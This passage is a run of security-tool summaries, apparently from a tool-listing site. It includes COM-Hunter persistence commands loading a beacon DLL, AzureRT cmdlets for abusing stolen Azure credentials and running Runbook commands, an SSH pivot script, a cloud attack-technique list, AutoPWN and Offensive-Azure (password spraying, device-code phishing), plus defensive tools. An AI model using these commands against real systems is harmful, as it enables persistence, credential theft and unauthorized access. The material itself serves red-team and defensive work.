.\COM-Hunter.exe Persist Tasksch <full_path_of_evil_dll>

-> TreatAs Usage:
.\COM-Hunter.exe Persist TreatAs <clsid> <full_path_of_evil_dll>

Example Usages

  • Get-Entry (Search Mode):

    .\COM-Hunter.exe Search Get-Entry
  • Find-Persist (Search Mode):

    .\COM-Hunter.exe Search Find-Persist
  • General (Persist Mode):

    .\COM-Hunter.exe Persist General 'HKCU:Software\Classes\CLSID\...' C:\Users\nickvourd\Desktop\beacon.dll
  • Tasksch (Persist Mode):

    .\COM-Hunter.exe Persist Tasksch C:\Users\nickvourd\Desktop\beacon.dll

Example Format Valid CLSIDs

Software\Classes\CLSID\...
HKCU:Software\Classes\CLSID\...
HKCU:\Software\Classes\CLSID\...
HKCU\Software\Classes\CLSID\...
HKEY_CURRENT_USER:Software\Classes\CLSID\...
HKEY_CURRENT_USER:\Software\Classes\CLSID\...
HKEY_CURRENT_USER\Software\Classes\CLSID\...


AzureRT - A Powershell Module Implementing Various Azure Red Team Tactics


Powershell module implementing various cmdlets to interact with Azure and Azure AD from an offensive perspective.

Helpful utilities deal with access-token-based authentication, switching from Az to the AzureAD and az cli interfaces, easy-to-use pre-made attacks such as Runbook-based command execution, and more.


The Most Valuable Cmdlets

This toolkit brings lots of various cmdlets. This section highlights the most important & useful ones.

Typical Red Team / audit workflow starting with stolen credentials can be summarised as follows:

Credentials Stolen -> Authenticate to Azure/AzureAD -> find whether they're valid -> find out what you can do with them

The below cmdlets are precisely suited to help you follow this sequence:

  1. Connect-ART - Offers various means to authenticate to Azure - credentials, PSCredential, token

  2. Connect-ARTAD - Offers various means to authenticate to Azure AD - credentials, PSCredential, token

  3. Get-ARTWhoami - When you authenticate - run this to check whoami and validate your access

  4. Get-ARTAccess - Then, when you know you have access - find out what you can do & what's possible by performing Azure situational awareness

  5. Get-ARTADAccess - Similarly you can find out what you can do scoped to Azure AD.


Use Cases

Cmdlets implemented in this module have proven helpful in the following use & attack scenarios:

  • Juggling with access tokens from Az to AzureAD and back again.
  • Nicely print authentication context (aka whoami) in Az, AzureAD, Microsoft.Graph and az cli at the same time
  • Display available permissions granted to the user on a target Azure VM
  • Display accessible Azure Resources along with permissions we have against them
  • Easily read all accessible Azure Key Vault secrets
  • Authenticate as a Service Principal to leverage Privileged Role Administrator role assigned to that Service Principal
  • Execute attack against Azure Automation via malicious Runbook

Installation

This module depends on the PowerShell Az and AzureAD modules being pre-installed. Microsoft.Graph and az cli are optional but nonetheless really useful. Before you start crafting around Azure, the following commands may be used to prepare your offensive environment:

Install-Module Az -Force -Confirm -AllowClobber -Scope CurrentUser
Install-Module AzureAD -Force -Confirm -AllowClobber -Scope CurrentUser
Install-Module Microsoft.Graph -Force -Confirm -AllowClobber -Scope CurrentUser # OPTIONAL
Install-Module MSOnline -Force -Confirm -AllowClobber -Scope CurrentUser # OPTIONAL
Install-Module AzureADPreview -Force -Confirm -AllowClobber -Scope CurrentUser # OPTIONAL
Install-Module AADInternals -Force -Confirm -AllowClobber -Scope CurrentUser # OPTIONAL

Import-Module Az
Import-Module AzureAD

Even though only the first two modules are required by AzureRT, it's good to have the others pre-installed too.

Then to load this module, simply type:

PS> . .\AzureRT.ps1

And you're good to go.

Or you can let AzureRT install and import all the dependencies:

PS> . .\AzureRT.ps1
PS> Import-ARTModules

Batteries Included

The module will gradually receive new tools and utilities, categorised by kill chain phase.

Every cmdlet has a nice help message detailing parameters, description and example usage:

PS C:\> Get-Help Connect-ART

Currently, the following utilities are included:

Authentication & Token mechanics

  • Get-ARTWhoami - Displays and validates our authentication context on Azure, AzureAD, Microsoft.Graph and on AZ CLI interfaces.

  • Connect-ART - Invokes Connect-AzAccount to authenticate current session to the Azure Portal via provided Access Token or credentials. Skips the burden of providing Tenant ID and Account ID by automatically extracting those from provided Token.

  • Connect-ARTAD - Invokes Connect-AzureAD (and optionally Connect-MgGraph) to authenticate current session to the Azure Active Directory via provided Access Token or credentials. Skips the burden of providing Tenant ID and Account ID by automatically extracting those from provided Token.

  • Connect-ARTADServicePrincipal - Invokes Connect-AzAccount to authenticate the current session to the Azure Portal via a provided Access Token or credentials. Skips the burden of providing Tenant ID and Account ID by automatically extracting those from the provided token. It then creates a self-signed PFX certificate and associates it with the Service Principal for authentication. Afterwards, it authenticates as that Service Principal to AzureAD and disassociates the certificate to clean up.

  • Get-ARTAccessTokenAzCli - Acquires access token from az cli, via az account get-access-token

  • Get-ARTAccessTokenAz - Acquires access token from Az module, via Get-AzAccessToken .

  • Get-ARTAccessTokenAzureAD - Gets an access token from Azure Active Directory. Authored by Simon Wahlin, @SimonWahlin

  • Get-ARTAccessTokenAzureADCached - Attempts to retrieve locally cached AzureAD access token (https://graph.microsoft.com), stored after Connect-AzureAD occurred.

  • Remove-ARTServicePrincipalKey - Performs cleanup actions after running Connect-ARTADServicePrincipal

Recon & Situational Awareness

  • Get-ARTAccess - Performs Azure Situational Awareness.

  • Get-ARTADAccess - Performs Azure AD Situational Awareness.

  • Get-ARTTenants - List Tenants available for the currently authenticated user (or the one based on supplied Access Token)

  • Get-ARTDangerousPermissions - Analyzes accessible Azure Resources and associated permissions user has on them to find all the Dangerous ones that could be abused by an attacker.

  • Get-ARTResource - Authenticates to https://management.azure.com using the provided Access Token and pulls accessible resources and the permissions the token owner has against them.

  • Get-ARTRoleAssignment - Displays a bit easier to read representation of assigned Azure RBAC roles to the currently used Principal.

  • Get-ARTADRoleAssignment - Displays Azure AD Role assignments on a current user or on all Azure AD users.

  • Get-ARTADScopedRoleAssignment - Displays Azure AD Scoped Role assignments on a current user or on all Azure AD users, associated with Administrative Units

  • Get-ARTRolePermissions - Displays all granted permissions on a specified Azure RBAC role.

  • Get-ARTADRolePermissions - Displays all granted permissions on a specified Azure AD role.

  • Get-ARTADDynamicGroups - Displays Azure AD Dynamic Groups along with their user Membership Rules, members count and current user membership status

  • Get-ARTApplication - Lists Azure AD Enterprise Applications that current user is owner of (or all existing when -All used) along with their owners and Service Principals

  • Get-ARTApplicationProxy - Lists Azure AD Enterprise Applications that have Application Proxy setup.

  • Get-ARTApplicationProxyPrincipals - Displays users and groups assigned to the specified Application Proxy application.

  • Get-ARTStorageAccountKeys - Displays all the available Storage Account keys.

  • Get-ARTKeyVaultSecrets - Lists all available Azure Key Vault secrets. This cmdlet assumes that requesting user connected to the Azure AD with KeyVaultAccessToken (scoped to https://vault.azure.net) and has "Key Vault Secrets User" role assigned (or equivalent).

  • Get-ARTAutomationCredentials - Lists all available Azure Automation Account credentials and attempts to pull their values (unable to pull values!).

  • Get-ARTAutomationRunbookCode - Invokes REST API method to pull specified Runbook's source code.

  • Get-ARTAzVMPublicIP - Retrieves Azure VM Public IP address

  • Get-ARTResourceGroupDeploymentTemplate - Displays Resource Group Deployment Template JSON based on input parameters, or pulls all of them at once.

  • Get-ARTAzVMUserDataFromInside - Retrieves Azure VM User Data from inside of a VM by reaching to Instance Metadata endpoint.

Privilege Escalation

  • Add-ARTADGuestUser - Sends Azure AD Guest user invitation e-mail, allowing to expand access to AAD tenant for the external attacker & returns Invite Redeem URL used to easily accept the invitation.

  • Set-ARTADUserPassword - Abuses Authentication Administrator Role Assignment to reset other non-admin users password.

  • Add-ARTUserToGroup - Adds a specified Azure AD User to the specified Azure AD Group.

  • Add-ARTUserToRole - Adds a specified Azure AD User to the specified Azure AD Role.

  • Add-ARTADAppSecret - Add client secret to the Azure AD Applications. Authored by Nikhil Mittal, @nikhil_mitt

Lateral Movement

  • Invoke-ARTAutomationRunbook - Creates an Automation Runbook under specified Automation Account and against selected Worker Group. That Runbook will contain Powershell commands to be executed on all the affected Azure VMs.

  • Invoke-ARTRunCommand - Abuses virtualMachines/runCommand permission against a specified Azure VM to run custom Powershell command.

  • Update-ARTAzVMUserData - Modifies Azure VM User Data script through a direct API invocation.

  • Invoke-ARTCustomScriptExtension - Creates new or modifies Azure VM Custom Script Extension leading to remote code execution.

Misc

  • Get-ARTTenantID - Retrieves Current user's Tenant ID or Tenant ID based on Domain name supplied.

  • Get-ARTPRTToken - Retrieves Current user's PRT (Primary Refresh Token) value using Dirk-Jan Mollema's ROADtoken

  • Get-ARTPRTNonce - Retrieves Current user's PRT (Primary Refresh Token) nonce value

  • Get-ARTUserId - Acquires current user or user specified in parameter ObjectId via Az module

  • Get-ARTSubscriptionId - Helper that collects current Subscription ID.

  • Parse-JWTtokenRT - Parses input JWT token and prints it out nicely.

  • Invoke-ARTGETRequest - Takes Access Token and invokes GET REST method API request against a specified URI. It also verifies whether provided token has required audience set.

  • Import-ARTModules - Installs & Imports required & optional Powershell modules for Azure Red Team activities


Show Support

This and other projects are the outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, consider buying me a coffee (or better, a beer) just to say thank you!


Mariusz Banach / mgeeky, (@mariuszbit)
<mb [at] binary-offensive.com>


Puwr - SSH Pivoting Script For Expanding Attack Surfaces On Local Networks


Easily expand your attack surface on a local network by discovering more hosts, via SSH.

Using a machine running an SSH service, Puwr sweeps a given subnet range for IPs, reporting back any successful ping requests. This can be used to expand your attack surface on a local network by surfacing hosts you couldn't normally reach from your own device.

(example below of how Puwr handles requests)

Usage

Puwr is simple to run, only requiring 4 flags:
python3 puwr.py (MACHINE IP) (USER) (PASSWORD) (SUBNET VALUE)

example:
python3 puwr.py 10.0.0.53 xeonrx password123 10.0.0.1/24

If you need to connect through a port other than 22, use the -p flag. (example: -p 2222)
If you want to keep quiet, use the -s flag to wait a specified number of seconds between requests. (example: -s 5)
Use the -h flag for usage reference in the script.

The paramiko and netaddr modules are required for this script to work!
You can install them with the pip tool:
pip install netaddr paramiko
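Conceptually, the pivot boils down to running ping on the remote SSH host for each address in the subnet. A minimal sketch of that idea with paramiko and netaddr (not Puwr's actual code; host and credentials are the placeholder values from the example above):

import paramiko
from netaddr import IPNetwork

# Connect to the pivot machine over SSH (placeholder credentials).
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect("10.0.0.53", port=22, username="xeonrx", password="password123")

# Ping each address in the subnet from the pivot and report the live hosts.
for ip in IPNetwork("10.0.0.1/24"):
    _, stdout, _ = client.exec_command(f"ping -c 1 -W 1 {ip} > /dev/null && echo up")
    if stdout.read().strip() == b"up":
        print(f"[+] Host alive: {ip}")

client.close()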

Disclaimer

Note this script is purely a small enumeration script and does not directly attack any discovered devices on the network. Whether you decide to maintain persistence on the machine and use it to attack other devices is your choice.

I encourage you to carry out these techniques only with permission and to stay within legal bounds. Unauthorized cyber attacks are highly illegal, and no one but you is responsible for any crime.

License

Puwr uses the MIT License. You can read about it here:

MIT License

Copyright (c) 2022 ciiphys

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


AWS-Threat-Simulation-and-Detection - Playing Around With Stratus Red Team (Cloud Attack Simulation Tool) And SumoLogic


This repository is a documentation of my adventures with Stratus Red Team - a tool for adversary emulation for the cloud.

Stratus Red Team is "Atomic Red Team for the cloud", allowing you to emulate offensive attack techniques in a granular and self-contained manner.


We run the attacks covered in the Stratus Red Team repository one by one on our AWS account. In order to monitor them, we will use CloudTrail and CloudWatch for logging and ingest these logs into SumoLogic for further analysis.

Attack | Description | Link
aws.credential-access.ec2-get-password-data | Retrieve EC2 Password Data | Link
aws.credential-access.ec2-steal-instance-credentials | Steal EC2 Instance Credentials | Link
aws.credential-access.secretsmanager-retrieve-secrets | Retrieve a High Number of Secrets Manager secrets | Link
aws.credential-access.ssm-retrieve-securestring-parameters | Retrieve And Decrypt SSM Parameters | Link
aws.defense-evasion.cloudtrail-delete | Delete CloudTrail Trail | Link
aws.defense-evasion.cloudtrail-event-selectors | Disable CloudTrail Logging Through Event Selectors | Link
aws.defense-evasion.cloudtrail-lifecycle-rule | CloudTrail Logs Impairment Through S3 Lifecycle Rule | Link
aws.defense-evasion.cloudtrail-stop | Stop CloudTrail Trail | Link
aws.defense-evasion.organizations-leave | Attempt to Leave the AWS Organization | Link
aws.defense-evasion.vpc-remove-flow-logs | Remove VPC Flow Logs | Link
aws.discovery.ec2-enumerate-from-instance | Execute Discovery Commands on an EC2 Instance | Link
aws.discovery.ec2-download-user-data | Download EC2 Instance User Data | TBD
aws.exfiltration.ec2-security-group-open-port-22-ingress | Open Ingress Port 22 on a Security Group | Link
aws.exfiltration.ec2-share-ami | Exfiltrate an AMI by Sharing It | Link
aws.exfiltration.ec2-share-ebs-snapshot | Exfiltrate EBS Snapshot by Sharing It | Link
aws.exfiltration.rds-share-snapshot | Exfiltrate RDS Snapshot by Sharing | Link
aws.exfiltration.s3-backdoor-bucket-policy | Backdoor an S3 Bucket via its Bucket Policy | Link
aws.persistence.iam-backdoor-role | Backdoor an IAM Role | Link
aws.persistence.iam-backdoor-user | Create an Access Key on an IAM User | TBD
aws.persistence.iam-create-admin-user | Create an administrative IAM User | TBD
aws.persistence.iam-create-user-login-profile | Create a Login Profile on an IAM User | TBD
aws.persistence.lambda-backdoor-function | Backdoor Lambda Function Through Resource-Based Policy | TBD

Credits

  1. Awesome team at Datadog, Inc. for Stratus Red Team here
  2. Hacking the Cloud AWS
  3. Falcon Force team blog


Lockc - Making Containers More Secure With eBPF And Linux Security Modules (LSM)


lockc is open source software for providing MAC (Mandatory Access Control)-type security audit for container workloads.

The main reason why lockc exists is that containers do not contain. Containers are not as secure and isolated as VMs. By default, they expose a lot of information about host OS and provide ways to "break out" from the container. lockc aims to provide more isolation to containers and make them more secure.

The Containers do not contain documentation section explains what we mean by that phrase and what kind of behavior we want to restrict with lockc.

The main technology behind lockc is eBPF - to be more precise, its ability to attach to LSM hooks.

Please note that lockc is currently an experimental project, not meant for production environments and without any official binaries or packages to use - currently the only way to use it is by building from source.

See the full documentation here. And the code documentation here.

If you need help or want to talk with contributors, please come chat with us in the #lockc channel on the Rust Cloud Native Discord server.

lockc's userspace part is licensed under Apache License, version 2.0.

eBPF programs inside lockc/src/bpf directory are licensed under GNU General Public License, version 2.



Sentinel-Attack - Tools To Rapidly Deploy A Threat Hunting Capability On Azure Sentinel That Leverages Sysmon And MITRE ATT&CK


Sentinel ATT&CK aims to simplify the rapid deployment of a threat hunting capability that leverages Sysmon and MITRE ATT&CK on Azure Sentinel.

DISCLAIMER: This tool requires tuning and investigative trialling to be truly effective in a production environment.


Overview

Sentinel ATT&CK provides the following tools:

Usage

Head over to the WIKI to learn how to deploy and run Sentinel ATT&CK.

A copy of the DEF CON 27 cloud village presentation introducing Sentinel ATT&CK can be found here and here.

Contributing

As this repository is constantly being updated and worked on, if you spot any problems we warmly welcome pull requests or submissions on the issue tracker.

Authors and contributors

Sentinel ATT&CK is built with <3 by:

  • Edoardo Gerosa

Special thanks go to the following contributors:



Nipe - An Engine To Make Tor Network Your Default Gateway


The Tor project allows users to surf the Internet, chat and send instant messages anonymously through its own mechanism. It is used by a wide variety of people, companies and organizations, both for lawful activities and for other illicit purposes. Tor has been widely used by intelligence agencies, hacking groups, criminal organizations and even ordinary users who care about their privacy in the digital world.

Nipe is an engine, developed in Perl, that aims to make the Tor network your default network gateway. Nipe routes traffic from your machine to the Internet through the Tor network, giving you a stronger stance on privacy and anonymity in cyberspace.

Currently, only IPv4 is supported by Nipe, but we are working on a solution that adds IPv6 support. Also, traffic destined for local and/or loopback addresses (other than DNS requests) is not routed through Tor. All non-local UDP/ICMP traffic is likewise blocked by the Tor network.


Download and install

  # Download
$ git clone https://github.com/htrgouvea/nipe && cd nipe

# Install libs and dependencies
$ sudo cpan install Try::Tiny Config::Simple JSON

# Nipe must be run as root
$ sudo perl nipe.pl install

Commands:

  COMMAND     FUNCTION
  install     Install dependencies
  start       Start routing
  stop        Stop routing
  restart     Restart the Nipe circuit
  status      See status

Examples:

perl nipe.pl install
perl nipe.pl start
perl nipe.pl stop
perl nipe.pl restart
perl nipe.pl status
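A quick sanity check after starting (a sketch; the exact status output may vary between versions):

# start routing and confirm the machine now exits through Tor
sudo perl nipe.pl start
sudo perl nipe.pl status   # should report an active state and a Tor exit node IP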

Demo


Contribution


License



Socialhunter - Crawls The Website And Finds Broken Social Media Links That Can Be Hijacked


Crawls the given URL and finds broken social media links that can be hijacked. Broken social links may allow an attacker to conduct phishing attacks, and they can also damage the company's reputation. Broken social media hijack issues are usually accepted in bug bounty programs.


Currently, it supports Twitter, Facebook, Instagram and TikTok without any API keys.


Installation

From Binary

You can download the pre-built binaries from the releases page and run them. For example:

wget https://github.com/utkusen/socialhunter/releases/download/v0.1.1/socialhunter_0.1.1_Linux_amd64.tar.gz

tar xzvf socialhunter_0.1.1_Linux_amd64.tar.gz

./socialhunter --help

From Source

  1. Install Go on your system
  2. Run: go get -u github.com/utkusen/socialhunter

Usage

socialhunter requires 2 parameters to run:

-f : Path of a text file containing URLs, one per line. The crawl function is path-aware: for example, if the URL is https://utkusen.com/blog, it only crawls pages under the /blog path.

-w : The number of workers to run (e.g. -w 10). The default value is 5. You can increase or decrease this after testing your system's capabilities.
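Putting the two flags together, a typical run might look like this (urls.txt is a hypothetical input file with one URL per line):

./socialhunter -f urls.txt -w 10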



AutoPWN Suite - Project For Scanning Vulnerabilities And Exploiting Systems Automatically


AutoPWN Suite is a project for scanning vulnerabilities and exploiting systems automatically.

How does it work?

AutoPWN Suite uses an nmap TCP-SYN scan to enumerate the host and detect the versions of software running on it. After gathering enough information about the host, AutoPWN Suite automatically generates a list of "keywords" to search the NIST vulnerability database.

Visit "PWN Spot!" for more information


Demo

AutoPWN Suite has very user-friendly, easy-to-read output.


Installation

You can install it using pip. (sudo recommended)

sudo pip install autopwn-suite

OR

You can clone the repo.

git clone https://github.com/GamehunterKaan/AutoPWN-Suite.git

OR

You can download the Debian (.deb) package from the releases page.

sudo apt-get install ./autopwn-suite_1.1.5.deb

Usage

Running with root privileges (sudo) is always recommended.

Automatic mode (This is the intended way of using AutoPWN Suite.)

autopwn-suite -y

Help Menu

$ autopwn-suite -h
usage: autopwn.py [-h] [-o OUTPUT] [-t TARGET] [-hf HOSTFILE] [-st {arp,ping}] [-nf NMAPFLAGS] [-s {0,1,2,3,4,5}] [-a API] [-y] [-m {evade,noise,normal}] [-nt TIMEOUT] [-c CONFIG] [-v]

AutoPWN Suite

options:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output file name. (Default : autopwn.log)
-t TARGET, --target TARGET
Target range to scan. This argument overwrites the hostfile argument. (192.168.0.1 or 192.168.0.0/24)
-hf HOSTFILE, --hostfile HOSTFILE
File containing a list of hosts to scan.
-st {arp,ping}, --scantype {arp,ping}
Scan type.
-nf NMAPFLAGS, --nmapflags NMAPFLAGS
Custom nmap flags to use for portscan. (Has to be specified like : -nf="-O")
-s {0,1,2,3,4,5}, --speed {0,1,2,3,4,5}
Scan speed. (Default : 3)
-a API, --api API Specify API key for vulnerability detection for faster scanning. (Default : None)
-y, --yesplease Don't ask for anything. (Full automatic mode)
-m {evade,noise,normal}, --mode {evade,noise,normal}
Scan mode.
-nt TIMEOUT, --noisetimeout TIMEOUT
Noise mode timeout. (Default : None)
-c CONFIG, --config CONFIG
Specify a config file to use. (Default : None)
-v, --version Print version and exit.
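As an illustration of the flags above, a fully automatic scan of a local range in evasion mode, writing results to a custom log file (all values are examples only):

autopwn-suite -t 192.168.0.0/24 -m evade -o scan.log -y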

TODO

  • Vulnerability detection based on version.
  • Easy to read output.
  • Function to output results to a file.
  • pypi package for easily installing with just pip install autopwn-suite.
  • Automatically install nmap if it's not installed.
  • Noise mode. (Does nothing but create a lot of noise)
  • .deb package for Debian based systems like Kali Linux and Parrot Security.
  • Argument for passing custom nmap flags.
  • Config file argument to specify configurations in a separate config file.
  • Function to automatically download exploit related to vulnerability.
  • Arch Linux package for Arch based systems like BlackArch and ArchAttack.
  • Separate script for checking local privilege escalation vulnerabilities.
  • Windows and OSX support.
  • Functionality to brute force common services like ssh, vnc, ftp etc.
  • Built in reverse shell handler that automatically stabilizes shell like pwncat.
  • Function to generate reverse shell commands based on IP and port.
  • GUI interface.
  • Meterpreter payload generator with common evasion techniques.
  • Fileless malware unique to AutoPWN Suite.
  • Daemon mode.
  • Option to email the results automatically.
  • Web application analysis.
  • Web application content discovery mode. (dirbusting)
  • Option to use as a module.

Contributing to AutoPWN Suite

I would be glad if you are willing to contribute to this project. I look forward to merging your pull request unless it's something that is not needed or just a personal preference. Click here for more info!

Legal

You may not rent, lease, distribute, modify, sell, or transfer the software to a third party. AutoPWN Suite is free to distribute and modify on the condition that credit is given to the creator and it is not used commercially. You may not use the software for illegal or nefarious purposes. No liability for consequential damages to the maximum extent permitted by all applicable laws.

Support or Contact

Having trouble using this tool? You can reach out to me on Discord, create an issue, or start a discussion!



Offensive-Azure - Collection Of Offensive Tools Targeting Microsoft Azure


Collection of offensive tools targeting Microsoft Azure written in Python to be platform agnostic. The current list of tools can be found below with a brief description of their functionality.

  • ./Device_Code/device_code_easy_mode.py
    • Generates a code to be entered by the target user
    • Can be used for general token generation or during a phishing/social engineering campaign.
  • ./Access_Tokens/token_juggle.py
    • Takes in a refresh token in various ways and retrieves a new refresh token and an access token for the resource specified
  • ./Access_Tokens/read_token.py
    • Takes in an access token and parses the included claims information, checks for expiration, attempts to validate signature
  • ./Outsider_Recon/outsider_recon.py
    • Takes in a domain and enumerates as much information as possible about the tenant without requiring authentication
  • ./User_Enum/user_enum.py
    • Takes in a username or list of usernames and attempts to enumerate valid accounts using one of three methods
    • Can also be used to perform a password spray
  • ./Azure_AD/get_tenant.py
    • Takes in an access token or refresh token, outputs tenant ID and tenant Name
    • Creates text output file as well as BloodHound compatible aztenant file
  • ./Azure_AD/get_users.py
    • Takes in an access token or refresh token, outputs all users in Azure AD and all available user properties in Microsoft Graph
    • Creates three data files, a condensed json file, a raw json file, and a BloodHound compatible azusers file
  • ./Azure_AD/get_groups.py
    • Takes in an access token or refresh token, outputs all groups in Azure AD and all available group properties in Microsoft Graph
    • Creates three data files, a condensed json file, a raw json file, and a BloodHound compatible azgroups file
  • ./Azure_AD/get_group_members.py
    • Takes in an access token or refresh token, outputs all group memberships in Azure AD and all available group member properties in Microsoft Graph
    • Creates three data files, a condensed json file, a raw json file, and a BloodHound compatible azgroups file
  • ./Azure_AD/get_subscriptions.py
    • Takes in an ARM token or refresh token, outputs all subscriptions in Azure and all available subscription properties in Azure Resource Manager
    • Creates three data files, a condensed json file, a raw json file, and a BloodHound compatible azgroups file
  • ./Azure_AD/get_resource_groups.py
    • Takes in an ARM token or refresh token, outputs all resource groups in Azure and all available resource group properties in Azure Resource Manager
    • Creates two data files, a raw json file, and a BloodHound compatible azgroups file
  • ./Azure_AD/get_vms.py
    • Takes in an ARM token or refresh token, outputs all virtual machines in Azure and all available VM properties in Azure Resource Manager
    • Creates two data files, a raw json file, and a BloodHound compatible azgroups file

Installation

Offensive Azure can be installed in a number of ways or not at all.

You are welcome to clone the repository and execute the specific scripts you want. A requirements.txt file is included for each module to make this as easy as possible.

Poetry

The project is built to work with poetry. To use, follow the next few steps:

git clone https://github.com/blacklanternsecurity/offensive-azure.git
cd ./offensive-azure
poetry install

Pip

The packaged version of the repo is also kept on PyPI, so you can use pip to install it as well. We recommend you use pipenv to keep your environment as clean as possible.

pipenv shell
pip install offensive_azure

Usage

It is up to you how you wish to use this toolkit. Each module can be run independently, or you can install the package and use it that way. Each module is exported to a script named the same as the module file. For example:

Poetry

poetry install
poetry run outsider_recon your-domain.com

Pip

pipenv shell
pip install offensive_azure
outsider_recon your-domain.com
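You can also skip packaging entirely and invoke a module straight from a clone of the repository; a sketch using the outsider recon module from the list above (remember that each module directory ships its own requirements.txt):

python3 ./Outsider_Recon/outsider_recon.py your-domain.com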


Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks

Blackbird

An OSINT tool to quickly search for accounts by username across 101 sites.

The Lockheed SR-71 "Blackbird" is a long-range, high-altitude, Mach 3+ strategic reconnaissance aircraft developed and manufactured by the American aerospace company Lockheed Corporation.

Disclaimer

This program is for educational purposes ONLY. Do not use it without permission.
The usual disclaimer applies, especially the fact that I (P1ngul1n0) am not liable for any
damages caused by direct or indirect use of the information or functionality provided by this
program. The author and any Internet provider bear NO responsibility for content or misuse
of this program or any derivatives thereof. By using this program you accept the fact
that any damage (data loss, system crash, system compromise, etc.) caused by the use of this
program is not P1ngul1n0's responsibility.

Setup

Clone the repository

git clone https://github.com/p1ngul1n0/blackbird
cd blackbird

Install requirements

pip install -r requirements.txt

Usage

Search by username

python blackbird.py -u username

Run WebServer

python blackbird.py --web

Access http://127.0.0.1:5000 in the browser

Read results file

python blackbird.py -f username.json

List supported sites

python blackbird.py --list-sites

Supported Social Networks

  1. Facebook
  2. YouTube
  3. Twitter
  4. Telegram
  5. TikTok
  6. Tinder
  7. Instagram
  8. Pinterest
  9. Snapchat
  10. Reddit
  11. Soundcloud
  12. Github
  13. Steam
  14. Linktree
  15. Xbox Gamertag
  16. Twitter Archived
  17. Xvideos
  18. PornHub
  19. Xhamster
  20. Periscope
  21. Ask FM
  22. Vimeo
  23. Twitch
  24. Pastebin
  25. WordPress Profile
  26. WordPress Site
  27. AllMyLinks
  28. Buzzfeed
  29. JsFiddle
  30. Sourceforge
  31. Kickstarter
  32. Smule
  33. Blogspot
  34. Tradingview
  35. Internet Archive
  36. Alura
  37. Behance
  38. MySpace
  39. Disqus
  40. Slideshare
  41. Rumble
  42. Ebay
  43. RedBubble
  44. Kik
  45. Roblox
  46. Armor Games
  47. Fortnite Tracker
  48. Duolingo
  49. Chess
  50. Shopify
  51. Untappd
  52. Last FM
  53. Cash APP
  54. Imgur
  55. Trello
  56. MCUUID Minecraft
  57. Patreon
  58. DockerHub
  59. Kongregate
  60. Vine
  61. Gamespot
  62. Shutterstock
  63. Chaturbate
  64. ProtonMail
  65. TripAdvisor
  66. RapidAPI
  67. HackTheBox
  68. Wikipedia
  69. Buymeacoffe
  70. Arduino
  71. League of Legends Tracker
  72. Lego Ideas
  73. Fiverr
  74. Redtube
  75. Dribble
  76. Packet Storm Security
  77. Ello
  78. Medium
  79. Hackaday
  80. Keybase
  81. HackerOne
  82. BugCrowd
  83. DevPost
  84. OneCompiler
  85. TryHackMe
  86. Lyrics Training
  87. Expo
  88. RAWG
  89. Coroflot
  90. Cloudflare
  91. Wattpad
  92. Mixlr
  93. ImageShack
  94. Freelancer
  95. Dev To
  96. BitBucket
  97. Ko Fi
  98. Flickr
  99. HackerEarth
  100. Spotify
  101. Snapchat Stories

Supersonic speed

Blackbird sends asynchronous HTTP requests, allowing much faster discovery of user accounts.

JSON Template

Blackbird uses JSON as a template to store and read data.

The data.json file stores all the sites that Blackbird checks.

Params

  • app - Site name
  • url
  • valid - Python expression that returns True when the user exists
  • id - Unique numeric ID
  • method - HTTP method
  • json - JSON POST body (needs to be escaped; use e.g.
    https://codebeautify.org/json-escape-unescape)
  • {username} - Username placeholder (in the URL or body)
  • response.status - HTTP response status
  • responseContent - Raw response body
  • soup - BeautifulSoup-parsed response body
  • jsonData - JSON response body

Examples

GET

    {
"app": "ExampleAPP1",
"url": "https://www.example.com/{username}",
"valid": "response.status == 200",
"id": 1,
"method": "GET"
}

POST JSON

    {
"app": "ExampleAPP2",
"url": "https://www.example.com/user",
"valid": "jsonData['message']['found'] == True",
"json": "{{\"type\": \"username\",\"input\": \"{username}\"}}",
"id": 2,
"method": "POST"
}
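GET with body matching

The valid field can also inspect the response body rather than the status code; a hypothetical entry using the responseContent variable described above (all values are illustrative):

    {
"app": "ExampleAPP3",
"url": "https://www.example.com/{username}",
"valid": "'Profile' in responseContent",
"id": 3,
"method": "GET"
}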

If you have any suggestion of a site to be included in the search, make a pull request following the template.

Contact

Feel free to contact me on Twitter



PacketStreamer - Distributed Tcpdump For Cloud Native Environments


Deepfence PacketStreamer is a high-performance remote packet capture and collection tool. It is used by Deepfence's ThreatStryker security observability platform to gather network traffic on demand from cloud workloads for forensic analysis.

Primary design goals:

  • Stay light, capture and stream, no additional processing
  • Portability: works across virtual machines, Kubernetes and AWS Fargate, on Linux and Windows

PacketStreamer sensors are started on the target servers. Sensors capture traffic, apply filters, and then stream the traffic to a central receiver. Traffic streams may be compressed and/or encrypted using TLS.

The PacketStreamer receiver accepts PacketStreamer streams from multiple remote sensors and writes the packets to a local pcap capture file.

PacketStreamer sensors collect raw network packets on remote hosts. Each sensor selects packets to capture using a BPF filter and forwards them to a central receiver process, where they are written in pcap format. Sensors are very lightweight and impose little performance impact on the remote hosts. PacketStreamer sensors can be run on bare-metal servers, on Docker hosts, and on Kubernetes nodes.

The PacketStreamer receiver accepts network traffic from multiple sensors, collecting it into a single, central pcap file. You can then process the pcap file or live-feed the traffic to the tooling of your choice, such as Zeek, Wireshark or Suricata, or as a live stream for machine learning models.

When to use PacketStreamer

PacketStreamer meets more general use cases than existing alternatives. For example, PacketBeat captures and parses the packets on multiple remote hosts, assembles transactions, and ships the processed data to a central ElasticSearch collector. ksniff captures raw packet data from a single Kubernetes pod.

